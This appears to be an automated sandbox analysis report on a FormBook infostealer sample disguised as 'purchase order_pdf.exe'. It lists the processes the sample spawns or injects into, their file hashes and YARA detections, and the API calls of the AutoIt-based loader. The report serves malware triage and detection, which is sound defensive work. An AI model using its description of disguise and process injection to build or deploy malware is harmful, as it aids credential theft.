Jul 8, 2024 07:23:00.766094923 CEST	479	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:23:00 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Target ID:	0
Start time:	01:18:51
Start date:	08/07/2024
Path:	C:\Users\user\Desktop\purchase order_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\purchase order_pdf.exe"
Imagebase:	0x870000
File size:	1'172'992 bytes
MD5 hash:	83256EB2C9EF7F753415482F83D9DE5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:18:53
Start date:	08/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\purchase order_pdf.exe"
Imagebase:	0x4e0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:19:27
Start date:	08/07/2024
Path:	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe"
Imagebase:	0xec0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:19:28
Start date:	08/07/2024
Path:	C:\Windows\SysWOW64\isoburn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\isoburn.exe"
Imagebase:	0x630000
File size:	107'008 bytes
MD5 hash:	BF19DD525C7D23CAFC086E9CCB9C06C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	01:19:41
Start date:	08/07/2024
Path:	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe"
Imagebase:	0xec0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:19:53
Start date:	08/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	147

Executed Functions

Function 00873B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00873B7A
IsDebuggerPresent.KERNEL32 ref: 00873B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,009362F8,009362E0,?,?), ref: 00873BFD

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

Part of subcall function 00880A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00873C26,009362F8,?,?,?), ref: 00880ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00873C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009293F0,00000010), ref: 008AD4BC
SetCurrentDirectoryW.KERNEL32(?,009362F8,?,?,?), ref: 008AD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00925D40,009362F8,?,?,?), ref: 008AD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 008AD581

Part of subcall function 00873A58: GetSysColorBrush.USER32(0000000F), ref: 00873A62
Part of subcall function 00873A58: LoadCursorW.USER32(00000000,00007F00), ref: 00873A71
Part of subcall function 00873A58: LoadIconW.USER32(00000063), ref: 00873A88
Part of subcall function 00873A58: LoadIconW.USER32(000000A4), ref: 00873A9A
Part of subcall function 00873A58: LoadIconW.USER32(000000A2), ref: 00873AAC
Part of subcall function 00873A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00873AD2
Part of subcall function 00873A58: RegisterClassExW.USER32(?), ref: 00873B28

Part of subcall function 008739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00873A15
Part of subcall function 008739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00873A36
Part of subcall function 008739E7: ShowWindow.USER32(00000000,?,?), ref: 00873A4A
Part of subcall function 008739E7: ShowWindow.USER32(00000000,?,?), ref: 00873A53

Part of subcall function 008743DB: _memset.LIBCMT ref: 00874401
Part of subcall function 008743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008744A6

Strings

This is a third-party compiled AutoIt script., xrefs: 008AD4B4
runas, xrefs: 008AD575

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 720fb67da7082e827fa3aafd2799f4456de3f063343881b4b1f1276baa57011f
Instruction ID: a73d07f783c2c1ff1958ad642b4d58a6c06c5a2675032f04b7ecc4d33d4d0423
Opcode Fuzzy Hash: 720fb67da7082e827fa3aafd2799f4456de3f063343881b4b1f1276baa57011f
Instruction Fuzzy Hash: B251E530908248BADB12ABB8DC05EFE7B75FF46304F04C065F469E21A6DA748645EF22

Function 00874AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00874B2B

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

GetCurrentProcess.KERNEL32(?,008FFAEC,00000000,00000000,?), ref: 00874BF8
IsWow64Process.KERNEL32(00000000), ref: 00874BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00874C45
FreeLibrary.KERNEL32(00000000), ref: 00874C50
GetSystemInfo.KERNEL32(00000000), ref: 00874C81
GetSystemInfo.KERNEL32(00000000), ref: 00874C8D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 99b587597c43f3afc502911b5ea6f954077da21d3dcbdfd5a9dc58b5f27748e0
Instruction ID: 6753103e1ccd5aa53fddd55f4bc73b8f3c92e33364eb8610e1c223df76af793c
Opcode Fuzzy Hash: 99b587597c43f3afc502911b5ea6f954077da21d3dcbdfd5a9dc58b5f27748e0
Instruction Fuzzy Hash: D991A13154ABC4DAD732CB6884515AABFE4FF66310B58999DD0CBD3E02D234E948C72A

Function 00874FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00874EEE,?,?,00000000,00000000), ref: 00874FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00874EEE,?,?,00000000,00000000), ref: 00875010
LoadResource.KERNEL32(?,00000000,?,?,00874EEE,?,?,00000000,00000000,?,?,?,?,?,?,00874F8F), ref: 008ADD60
SizeofResource.KERNEL32(?,00000000,?,?,00874EEE,?,?,00000000,00000000,?,?,?,?,?,?,00874F8F), ref: 008ADD75
LockResource.KERNEL32(00874EEE,?,?,00874EEE,?,?,00000000,00000000,?,?,?,?,?,?,00874F8F,00000000), ref: 008ADD88

Strings

SCRIPT, xrefs: 00875006

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 0e7d492fc46dd90374d94065d73d4bf71f1e00e2f9150f5b93fb3dc0ef5fa0f0
Instruction ID: 8d55896064f8e5b7e61d94465f59bd91ca4a40a12f01bc29a47f5b68fe16774b
Opcode Fuzzy Hash: 0e7d492fc46dd90374d94065d73d4bf71f1e00e2f9150f5b93fb3dc0ef5fa0f0
Instruction Fuzzy Hash: 52115A75200B01AFE7218B65DC58F677BB9FFC9B51F208168F50AC62A0DBB1E840C6A0

Function 008D4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,008AE7C1), ref: 008D46A6
FindFirstFileW.KERNELBASE(?,?), ref: 008D46B7
FindClose.KERNEL32(00000000), ref: 008D46C7

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 8031d82e269f2c2b7dbe536eb24aeb3a60c9cd4d78cff4468678f57057900857
Instruction ID: 043fda067d54754090808416b4d87b23cf3b7e22e9c6be3ef77a22b9259c42ef
Opcode Fuzzy Hash: 8031d82e269f2c2b7dbe536eb24aeb3a60c9cd4d78cff4468678f57057900857
Instruction Fuzzy Hash: 17E0D8314144005B52106738FC4D8FA775CFE16335F100716FA36C12E0E7B09950C595

Function 0087E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 008B428C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 6ae5bef1dd8d66321372a0548fc760b00be514192515b26385eaf13b5019f765
Instruction ID: 663b8d5fb24344b92bef1a06e3c43c45e9e6b6df7d76a3c5170f6c729a3a3efd
Opcode Fuzzy Hash: 6ae5bef1dd8d66321372a0548fc760b00be514192515b26385eaf13b5019f765
Instruction Fuzzy Hash: 0FA28D75A04219CFCB24CF58C480AAAB7B1FF58314F24C5A9E91AEB35AD731ED42CB51

Function 00880B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00880BBB
timeGetTime.WINMM ref: 00880E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00880FB3
TranslateMessage.USER32(?), ref: 00880FC7
DispatchMessageW.USER32(?), ref: 00880FD5
Sleep.KERNEL32(0000000A), ref: 00880FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0088105A
DestroyWindow.USER32 ref: 00881066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00881080
Sleep.KERNEL32(0000000A,?,?), ref: 008B52AD
TranslateMessage.USER32(?), ref: 008B608A
DispatchMessageW.USER32(?), ref: 008B6098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008B60AC

Strings

@GUI_WINHANDLE, xrefs: 008B53B9
@GUI_CTRLID, xrefs: 008B5364
@COM_EVENTOBJ, xrefs: 008B591A
@TRAY_ID, xrefs: 008B5BB9
@GUI_CTRLHANDLE, xrefs: 008B540E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: df82bbb95521036e977ed2e2c3723f1a405af79c1f9f6573aeeac5c31385b931
Instruction ID: c40b064017d6fe3b0aefdee318eeed1c679206231079b988c5b8a9d27dfd5049
Opcode Fuzzy Hash: df82bbb95521036e977ed2e2c3723f1a405af79c1f9f6573aeeac5c31385b931
Instruction Fuzzy Hash: C0B27E70608741DFD724DB28C894BAAB7E5FF84304F14892DE59AD73A1DB71E849CB82

Function 008D93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D91E9: __time64.LIBCMT ref: 008D91F3

Part of subcall function 00875045: _fseek.LIBCMT ref: 0087505D

__wsplitpath.LIBCMT ref: 008D94BE

Part of subcall function 0089432E: __wsplitpath_helper.LIBCMT ref: 0089436E

_wcscpy.LIBCMT ref: 008D94D1
_wcscat.LIBCMT ref: 008D94E4
__wsplitpath.LIBCMT ref: 008D9509
_wcscat.LIBCMT ref: 008D951F
_wcscat.LIBCMT ref: 008D9532

Part of subcall function 008D922F: _memmove.LIBCMT ref: 008D9268
Part of subcall function 008D922F: _memmove.LIBCMT ref: 008D9277

_wcscmp.LIBCMT ref: 008D9479

Part of subcall function 008D99BE: _wcscmp.LIBCMT ref: 008D9AAE
Part of subcall function 008D99BE: _wcscmp.LIBCMT ref: 008D9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008D96DC
_wcsncpy.LIBCMT ref: 008D974F
DeleteFileW.KERNEL32(?,?), ref: 008D9785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008D979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008D97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008D97BE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 355c46714c3409bc9a4d1e3e355f84f9c54efd84c7941709d0adfaa1c5b391bc
Instruction ID: 1c91d88532fb5495682924c327e22342e0d3751d7d804ebbb609b0beb440acec
Opcode Fuzzy Hash: 355c46714c3409bc9a4d1e3e355f84f9c54efd84c7941709d0adfaa1c5b391bc
Instruction Fuzzy Hash: 45C13CB1900219AACF21DF98CC85EDEB7BDFF55314F0041AAF609E7251DB709A448F65

Function 00873015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00873074
RegisterClassExW.USER32(00000030), ref: 0087309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008730AF
InitCommonControlsEx.COMCTL32(?), ref: 008730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008730DC
LoadIconW.USER32(000000A9), ref: 008730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00873101

Strings

TaskbarCreated, xrefs: 008730A4
+, xrefs: 0087305D
AutoIt v3 GUI, xrefs: 00873090
0, xrefs: 00873056

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 932bb5e9be5b02692caa1acbc6d9ee9dac2eb0134d7cf3aa00dfd8cda2c385f8
Instruction ID: f8fefa3ecfa80ac92898b12d21c7560a5a4443168a85cb8f2a9e243a50da67ad
Opcode Fuzzy Hash: 932bb5e9be5b02692caa1acbc6d9ee9dac2eb0134d7cf3aa00dfd8cda2c385f8
Instruction Fuzzy Hash: 6B317A71854349AFDB01DFA4DC88AE9BFF0FF09310F10856AE650E62A1D7B50585DF91

Function 00873041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00873074
RegisterClassExW.USER32(00000030), ref: 0087309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008730AF
InitCommonControlsEx.COMCTL32(?), ref: 008730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008730DC
LoadIconW.USER32(000000A9), ref: 008730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00873101

Strings

TaskbarCreated, xrefs: 008730A4
+, xrefs: 0087305D
AutoIt v3 GUI, xrefs: 00873090
0, xrefs: 00873056

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 965700b994ab419de70861d19f6500b9a65de52ee5fa928e9acc88f36ebf700e
Instruction ID: cc10d1833a30d5ba0c3b909948c3c85c8e57bb57fcebe27ef5ee4804f1e12eff
Opcode Fuzzy Hash: 965700b994ab419de70861d19f6500b9a65de52ee5fa928e9acc88f36ebf700e
Instruction Fuzzy Hash: 0421C4B1914218BFDB00DFA4EC89BADBBF4FB08700F10812AFA10E62A1D7B54544DFA5

Function 008771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00874864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009362F8,?,008737C0,?), ref: 00874882

Part of subcall function 0089074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008772C5), ref: 00890771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00877308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008AECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008AED32
RegCloseKey.ADVAPI32(?), ref: 008AED70
_wcscat.LIBCMT ref: 008AEDC9

Strings

Software\AutoIt v3\AutoIt, xrefs: 008772FE
Include, xrefs: 008AECE8, 008AED29
\Include\, xrefs: 008772C5
\, xrefs: 008AEDEC
